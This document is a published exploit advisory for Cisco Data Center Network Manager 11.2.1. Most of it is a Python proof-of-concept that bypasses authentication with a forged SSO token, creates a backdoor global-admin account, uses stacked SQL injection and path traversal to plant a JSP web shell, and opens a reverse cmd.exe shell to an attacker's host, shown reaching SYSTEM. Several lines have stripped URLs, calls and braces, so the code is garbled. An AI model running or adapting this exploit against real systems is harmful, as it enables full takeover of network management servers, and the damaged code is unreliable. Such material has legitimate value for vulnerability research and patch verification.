Cisco Data Center Network Manager 11.2.1 SQL Injection

Related Vulnerabilities: CVE-2019-15976   CVE-2019-15984  
Publish Date: 06 Feb 2020
Author: mr_me
Cisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability

Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
- Release: 11.2(1)
- Release Date: 18-Jun-2019
- FileName:
- Size: 1619.36 MB (1698022100 bytes)
- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5 

Bug 1: CVE-2019-15976 / ZDI-20-008
Bug 2: CVE-2019-15984 / ZDI-20-060


saturn:~ mr_me$ ./ 
(+) usage: ./ <target> <connectback>
(+) eg: ./

saturn:~ mr_me$ ./
(+) created the account hacker:Hacked123
(+) created the 1337/custom path!
(+) leaked vfs! temp230cf31722794196/content-ed98b5003b1c695c
(+) SQL Injection working!
(+) wrote the si.jsp shell!
(+) cleaned up the database!
(+) starting handler on port 1337
(+) connection from
(+) pop thy shell!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>whoami
nt authority\system

C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>

Clean Up:

1. delete from xmlDocs where user_name = '1337';
2. delete si.jsp from the web root
3. delete the folder and its contents: C:/Program Files/Cisco Systems/dcm/fm/reports/1337

import re
import md5
import sys
import time
import socket
import base64
import requests
import telnetlib
from threading import Thread
from xml.etree import ElementTree
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def _get_jsp(cbh, cbp):
    """ get me some jsp for a connectback! """
    jsp = """
    <%%@page import="java.lang.*"%%>
    <%%@page import="java.util.*"%%>
    <%%@page import="*"%%>
    <%%@page import="*"%%>

      // clean up
      String[] files = {
          "C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/si.xml", 
          "C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/",
          "C:/Program Files/Cisco Systems/dcm/fm/reports/1337/",
      for (String s:files){ File f = new File(s); f.delete(); }
      File f = new File(application.getRealPath("/" + this.getClass().getSimpleName().replaceFirst("_",".")));
      class StreamConnector extends Thread
        InputStream we;
        OutputStream uo;

        StreamConnector( InputStream we, OutputStream uo )
          this.we = we;
          this.uo = uo;

        public void run()
          BufferedReader dy  = null;
          BufferedWriter zvi = null;
            dy  = new BufferedReader( new InputStreamReader( this.we ) );
            zvi = new BufferedWriter( new OutputStreamWriter( this.uo ) );
            char buffer[] = new char[8192];
            int length;
            while( ( length = buffer, 0, buffer.length ) ) > 0 )
              zvi.write( buffer, 0, length );
          } catch( Exception e ){}
            if( dy != null )
            if( zvi != null )
          } catch( Exception e ){}

        String ShellPath;
        ShellPath = new String("cmd.exe");
        Socket socket = new Socket( "%s", %s);
        Process process = Runtime.getRuntime().exec( ShellPath );
        ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
        ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
      } catch( Exception e ) {}
    """ % (cbh, cbp)
    return jsp

def get_session(target, user, password):
    """ we have bypassed auth at this point and created an admin """
    d = {
        "j_username" : user,
        "j_password" : password
    uri = "https://%s/j_spring_security_check" % target
    r =, data=d, verify=False, allow_redirects=False)
    if "Set-Cookie" in r.headers:
        match ="JSESSIONID=(.{56}).*resttoken=(\d{1,4}:.{44});", r.headers["Set-Cookie"])
        if match:
            sessionid =
            resttoken =
            return { "JSESSIONID" : sessionid, "resttoken": resttoken}
    return False

def craft_soap_header():
    soap_header  = '\t<SOAP-ENV:Header xmlns:SOAP-ENV="" xmlns:xsd="" xmlns:xsi="">'
    soap_header += '<m:ssoToken xmlns:m="">%s</m:ssoToken>' % gen_ssotoken()
    soap_header += '\t</SOAP-ENV:Header>'
    return soap_header

def we_can_trigger_folder_path_creation(target):
    """ craft the path location and db entry for the traversal """
    soap_body  = '<soapenv:Envelope xmlns:soapenv="" xmlns:ep="">'
    soap_body += craft_soap_header()
    soap_body += '\t<soapenv:Body>'
    soap_body += '\t\t<ep:saveReportTemplate>'
    soap_body += '\t\t\t<reportTemplateName>si</reportTemplateName>'
    soap_body += '\t\t\t<userName>1337</userName>'
    soap_body += '\t\t\t<updatedAttrs></updatedAttrs>'
    soap_body += '\t\t\t<pmInterval>1337</pmInterval>'
    soap_body += '\t\t</ep:saveReportTemplate>'
    soap_body += '\t</soapenv:Body>'
    soap_body += '</soapenv:Envelope>'
    uri = "https://%s/ReportWSService/ReportWS" % target
    r =, data=soap_body, verify=False)
    if r.status_code == 200:
        return True
    return False

def we_can_trigger_second_order_write(target, shellpath):
    """ trigger the traversal """
    soap_body  = '<soapenv:Envelope xmlns:soapenv="" xmlns:ep="">'
    soap_body += craft_soap_header()
    soap_body += '\t<soapenv:Body>'
    soap_body += '\t\t<ep:openReportTemplate>'
    soap_body += '\t\t\t<reportTemplateName>%s</reportTemplateName>' % shellpath
    soap_body += '\t\t\t<userName>1337</userName>'
    soap_body += '\t\t</ep:openReportTemplate>'
    soap_body += '\t</soapenv:Body>'
    soap_body += '</soapenv:Envelope>'
    uri = "https://%s/ReportWSService/ReportWS" % target
    r =, data=soap_body, verify=False)
    if r.status_code == 200:
        return True
    return False

def gen_ssotoken():
    """ auth bypass """
    timestamp = 9999999999999  # we live forever
    username = "hax"           # doesnt even need to exist!
    sessionid = 1337           # doesnt even need to exist!
    d = "%s%d%dPOsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF" % (username, sessionid, timestamp)
    return "%d.%d.%s.%s" % (sessionid, timestamp, base64.b64encode(, username)

def we_can_trigger_sql_injection(target, sql):
    """ stacked sqli primitive """
    sqli = ";%s--" % sql
    soap_body  = '<soapenv:Envelope xmlns:soapenv="" xmlns:ep="">'
    soap_body += craft_soap_header()
    soap_body += '\t<soapenv:Body>'
    soap_body += '\t\t<ep:getVmHostData>'
    soap_body += '\t\t\t<arg0>'
    soap_body += '\t\t\t\t<sortField>vcluster</sortField>'
    soap_body += '\t\t\t\t<sortType>%s</sortType>' % sqli
    soap_body += '\t\t\t</arg0>'
    soap_body += '\t\t\t<arg1></arg1>'
    soap_body += '\t\t\t<arg2></arg2>'
    soap_body += '\t\t\t<arg3>false</arg3>'
    soap_body += '\t\t</ep:getVmHostData>'
    soap_body += '\t</soapenv:Body>'
    soap_body += '</soapenv:Envelope>'
    uri = "https://%s/DbInventoryWSService/DbInventoryWS" % target
    r =, data=soap_body, verify=False)
    if r.status_code == 200:
        return True
    return False

def we_can_leak_vfs(target):
    """ we use a information disclosure for the vfs path """
    global vfs
    uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target
    c = requests.auth.HTTPBasicAuth('admin', 'nbv_12345')
    r = requests.get(uri, verify=False, auth=c)
    match ="temp\\(.{21}content-.{15,16})", r.text)
    if match:
        vfs = str("\\","/"))
        return True
    return False

def handler(lp):
    """ this is the client handler, to catch the connectback """
    print "(+) starting handler on port %d" % lp
    t = telnetlib.Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("", lp))
    conn, addr = s.accept()
    print  "(+) connection from %s" % addr[0]
    t.sock = conn
    print "(+) pop thy shell!"

def exec_code(t, usr, pwd, cbp):
    """ this function threads the client handler and sends off the attacking payload """
    handlerthr = Thread(target=handler, args=(int(cbp),))
    r = requests.get("https://%s/si.jsp" % t, cookies=get_session(t, usr, pwd), verify=False)

def we_can_add_user(target, usr, pwd):
    """ add a user so that we can reach our backdoor! """
    soap_body  = '<soapenv:Envelope xmlns:soapenv="" xmlns:ep="">'
    soap_body += craft_soap_header()
    soap_body += '\t<soapenv:Body>'
    soap_body += '\t\t<ep:addUser>'
    soap_body += '\t\t\t<userName>%s</userName>' % usr
    soap_body += '\t\t\t<password>%s</password>' % pwd
    soap_body += '\t\t\t<roleName>global-admin</roleName>'
    soap_body += '\t\t\t<enablePwdExpiration>false</enablePwdExpiration>'
    soap_body += '\t\t</ep:addUser>'
    soap_body += '\t</soapenv:Body>'
    soap_body += '</soapenv:Envelope>'
    uri = "https://%s/DbAdminWSService/DbAdminWS" % target
    r =, data=soap_body, verify=False)
    tree = ElementTree.fromstring(r.content)
    for elem in tree.iter():
        if elem.tag == "resultMessage":
            res = elem.text
    if res == "Success":
        return True
    elif res == "User already exists.":
        return True
    return False

def main():

    usr = "hacker"
    pwd = "Hacked123"

    if len(sys.argv) != 3:
        print "(+) usage: %s <target> <connectback>" % sys.argv[0]
        print "(+) eg: %s" % sys.argv[0]

    t = sys.argv[1]
    c = sys.argv[2]

    cbh = c.split(":")[0]
    cbp = c.split(":")[1]
    sc = _get_jsp(cbh, cbp).encode("hex")

    # stage 1 - add a user
    if we_can_add_user(t, usr, pwd):
        print "(+) created the account %s:%s" % (usr, pwd)

        # stage 2 - trigger folder creation and db entry
        if we_can_trigger_folder_path_creation(t):
            print "(+) created the 1337/custom path!"

            # stage 3 - leak the vfs path (not really required I suppose)
            if we_can_leak_vfs(t):
                print "(+) leaked vfs! %s" % vfs

                # stage 4 - trigger the sql injection to update our template entry
                sp = "../../../../wildfly-10.1.0.Final/standalone/tmp/vfs/temp/%s/si.jsp" % vfs
                sql = "update xmldocs set document_name='%s',content=decode('%s','hex') where user_name='1337';" % (sp, sc)
                if we_can_trigger_sql_injection(t, sql):
                    print "(+) SQL Injection working!"

                    # stage 5 - trigger the shell write
                    if we_can_trigger_second_order_write(t, sp):
                        print "(+) wrote the si.jsp shell!"

                        # stage 6 - cleanup
                        sql = "delete from xmldocs where user_name='1337';"
                        if we_can_trigger_sql_injection(t, sql):
                            print "(+) cleaned up the database!"

                        # stage 7 - go get some rce
                        exec_code(t, usr, pwd, cbp)

if __name__ == "__main__":